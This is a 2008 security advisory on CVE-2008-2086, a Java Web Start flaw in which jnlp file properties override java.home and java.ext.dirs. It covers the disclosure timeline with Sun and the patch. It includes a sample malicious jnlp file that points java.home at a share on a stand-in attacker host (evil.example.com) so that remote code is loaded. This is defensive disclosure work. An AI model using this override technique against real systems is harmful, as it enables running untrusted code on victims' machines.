Java Web Start File Inclusion
via System Properties Override

Release Date 2008-12-03
Application Sun Java Runtime Environment / Java Web Start
Versions See below
Severity High
Author Timothy D. Morgan <tmorgan {a} vsecurity.com>
Vendor Status Patch Released [3]
CVE Candidate CVE-2008-2086
Reference Original Advisory

Product Description

From [1]:

Using Java Web Start technology, standalone Java software applications can be deployed with a single click over the network. Java Web Start ensures the most current version of the application will be deployed, as well as the correct version of the Java Runtime Environment (JRE).

Vulnerability Overview

On March 27th, VSR identified a vulnerability in Java Web Start related to the execution of privileged applications. This flaw could allow an attacker to execute arbitrary code on a victim system if a user could be convinced to visit a malicious web site.

Product Background

Java Web Start (JWS) applications are launched through specially formatted XML files hosted on web sites with a "jnlp" file extension. These files reference one or more "jar" files which are meant to be downloaded and executed by client systems. JWS applications are run in unprivileged mode by default but may be run with full user privileges if the jnlp file requests this access. Privileged JWS applications must have each jar file signed by the same trusted author in order to be executed. However, jnlp files are not signed and may be hosted by third-party web sites.

In addition to specifying application components, the jnlp specification permits application authors to supply certain System properties which may be retrieved by the application through the System.getProperty() and System.getProperties() methods. Besides any user-supplied properties, the Java VM also provides access to a number of sensitive runtime settings through this interface.

More information on the jnlp format may be found in [2].

Vulnerability Details

VSR discovered an unsafe behavior in the way properties are interpreted when specified in jnlp files. In certain versions of the Java Runtime Engine (JRE), values supplied through jnlp files override existing system defaults. Thus far, VSR has verified the following System properties may be overridden:

  java.home
  java.ext.dirs
  user.home

Of particular interest are the java.home and java.ext.dirs properties. If an attacker could lure a victim to open a malicious jnlp file which references a trusted application, it may be executed without any confirmation by the user. However, as the application attempts to load classes, it may trust the malicous java.home and/or java.ext.dirs value. These paths could point to a malicious local or remote JRE or extensions installation. It appears that under Windows, UNC network paths may be used for the java.home value. It is not yet known whether or not UNC paths may be used for java.ext.dirs.

During testing, VSR found that Java Cryptography Extension (JCE) classes failed to load when java.home was set to an invalid path. However, by setting this path to network share which hosted a valid JRE installation, the JCE classes loaded correctly. If such a network share were hosted by the attacker, then arbitrary code could potentially be loaded without restrictions, unbeknownst to the victim.

The following XML shows what a malicious jnlp file might look like. Note that the malicious jnlp file would likely be very similar to the ones users normally rely on with certain properties overridden in the resources section.

<jnlp spec="1.0+" codebase="http://trusted.example.org/" href="evil.jnlp">
  <information>
    <title>Trusted Application</title>
    <vendor>Trusted Vendor</vendor>
    <description>Trusted Application by Trusted Vendor</description>
    <homepage href="http://trusted.example.org/" />
    <offline-allowed />
  </information>
  <security><all-permissions /></security>
  <resources>
    <j2se version="1.5+" />
    <!-- Next line overrides the JRE's java.home System property -->
    <property name="java.home" value="\\evil.example.com\jre" />
    <jar href="signed-and-trusted-jce-dependent-library.jar" />
  </resources>
  <application-desc main-class="org.example.trusted.app.StartApp" />
</jnlp>

To fully exploit this specific attack vector, an attacker would need to remotely or locally host a malicious version of classes used by a trusted application and then lure a user into opening a malicious jnlp file. A firewall installed between the attacker and victim could mitigate this issue if the victim's machine were restricted from accessing the hosted network share.

Note that certain JWS applications may trust other System properties, such as user.home, and use them in ways which could be exploited in application-specific variants of this attack.

Versions Affected

During testing, VSR found the following JRE versions to be vulnerable:

Version 1.6.0_05 on Windows did not appear to be vulnerable. However, Sun recommends that any installations with the following versions be updated:

Sun reports that JRE 1.3.x is not affected, nor is JRE 6 Update 7 for Intel Itanium. For more information on versions affected and updates, see [3].

Vendor Response

The following timeline details Sun's response to the reported issue:

2008-03-28 Sun was provided a draft advisory.
2008-03-28 An initial response was received from Sun.
2008-04-11 Sun reported that the issue could not be reproduced.
2008-04-11 VSR provided Sun additional exploit details.
2008-04-29 Sun reported the issue was reproduced and assigned an internal issue tracking number of CR 6694892.
2008-12-03 Sun Alert 244988 was released with an associated security update.

Sun Alert 244988 may be obtained at:
http://sunsolve.sun.com/search/document.do?assetkey=1-66-244988-1

Recommendation

Apply the JRE update as soon as possible. The issue is fixed in:

Review Sun Alert 244988 [3] for information on how to temporarily disable Java Web Start to work around this issue.

Common Vulnerabilities and Exposures (CVE) Information

The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2008-2086 to this issue. This is a candidate for inclusion in the CVE list, which standardizes names for security problems.

Acknowledgements

Thanks to George Gal for assistance in testing. VSR would like to thank Sun for cooperating in the patch development process.


References

1. Java Web Start Technology
http://java.sun.com/products/javawebstart/
2. Java Web Start Architecture JNLP Specification & API Documentation
http://java.sun.com/products/javawebstart/download-spec.html
3. Sun Alert 244988
http://sunsolve.sun.com/search/document.do?assetkey=1-66-244988-1

Copyright © 2008 Virtual Security Research, LLC. All rights reserved.

2013-06-19
IBM WebSphere Commerce: Encrypted URL Parameter Vulnerable to POA

2012-10-23
Timothy D. Morgan presents No Crack Required: Cryptanalysis in Real-World Applications at OWASP AppSecUSA 2012.

2012-07-29
Michael Coppola presents Owning the Network: Adventures in Router Rootkits at DEF CON 20 [slides].

2012-04-20
HTC IQRD Android Permission Leakage

more...

Contact us by phone,
fax or e-mail:

Phone: 617.933.8919
Fax: 617.933.8920
Email: inquiry@vsecurity.com